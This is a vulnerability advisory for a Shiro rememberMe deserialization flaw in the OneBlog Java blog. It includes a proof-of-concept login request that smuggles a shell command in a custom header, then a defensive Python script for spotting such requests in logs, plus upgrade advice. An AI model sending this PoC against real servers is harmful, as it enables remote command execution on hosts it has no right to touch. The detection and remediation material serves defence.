Vulnerability Alert | OneBlog Deserialization Vulnerability

0x00 Vulnerability ID
  • None assigned yet

0x01 Severity
  • High

0x02 Overview

OneBlog is a clean, attractive, feature-rich and responsive blog written in Java.

0x03 Details

Type: deserialization
Impact: arbitrary command execution
Summary: OneBlog v2.2.2 and earlier contain an Apache Shiro deserialization vulnerability. The root cause is a hard-coded Shiro cipher key shipped with the software: an attacker who knows the key can produce a malicious serialized rememberMe payload that the server decrypts and deserializes, leading to arbitrary code execution on the server, including running system commands or implanting an in-memory webshell, and ultimately full control of the host.

0x04 Affected versions
  • OneBlog <= v2.2.2

0x05 POC

GET /passport/login/ HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=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
X-Token-Data: echo "changge"

For security research and educational use only. Anyone who uses this for any other purpose bears full legal and joint liability; the author and publisher accept no legal or joint liability.
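The request above has two traits a defender can look for in web logs or at a reverse proxy: a rememberMe cookie far larger than Shiro's own serialized principal (gadget-chain payloads run to kilobytes) and the non-standard X-Token-Data header. The following triage script is an added example written for this advisory, not code from OneBlog or Shiro; the size threshold and the sample requests are constructed assumptions.

```python
import base64
import binascii

# Decoded rememberMe values above this size are unlikely to be Shiro's own
# serialised PrincipalCollection (normally a few hundred bytes); this is an
# assumed threshold to tune per deployment.
MAX_LEGIT_REMEMBERME_BYTES = 1024
# Non-standard request header seen in the advisory's PoC.
SUSPICIOUS_HEADERS = ["x-token-data"]

def parse_request(raw: str):
    """Split a raw HTTP/1.1 request into (method, path, lower-cased headers)."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, path, headers

def remember_me_cookie(headers):
    """Return the raw rememberMe cookie value, or None if absent."""
    for part in headers.get("cookie", "").split(";"):
        name, _, value = part.strip().partition("=")
        if name == "rememberMe":
            return value
    return None

def assess(raw: str):
    """Return the reasons a request looks like a Shiro rememberMe attack."""
    reasons = []
    _, _, headers = parse_request(raw)
    for h in SUSPICIOUS_HEADERS:
        if h in headers:
            reasons.append(f"non-standard header {h}")
    value = remember_me_cookie(headers)
    if value and value != "deleteMe":  # deleteMe is Shiro's own clear-cookie marker
        try:
            decoded = base64.b64decode(value, validate=True)
        except binascii.Error:
            reasons.append("rememberMe is not valid base64")
        else:
            if len(decoded) > MAX_LEGIT_REMEMBERME_BYTES:
                reasons.append(f"rememberMe decodes to {len(decoded)} bytes")
    return reasons

# Constructed sample requests (not captured traffic): a PoC-shaped request with a
# 3000-byte dummy cookie body, and a benign login with a normal-sized cookie.
ATTACK_REQUEST = ("GET /passport/login/ HTTP/1.1\r\nHost: blog.example\r\nCookie: rememberMe="
                  + base64.b64encode(bytes(3000)).decode() + "\r\nX-Token-Data: echo \"x\"\r\n\r\n")
BENIGN_REQUEST = ("GET /passport/login/ HTTP/1.1\r\nHost: blog.example\r\nCookie: rememberMe="
                  + base64.b64encode(bytes(200)).decode() + "; JSESSIONID=abc\r\n\r\n")
```

Run assess() over each request in a log export; any non-empty result is worth correlating with a following "rememberMe=deleteMe" Set-Cookie or a new outbound process from the Java service.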

0x06 Remediation

The vendor has released a fixed version; users are advised to upgrade to a patched release:
https://docs.zhyd.me/
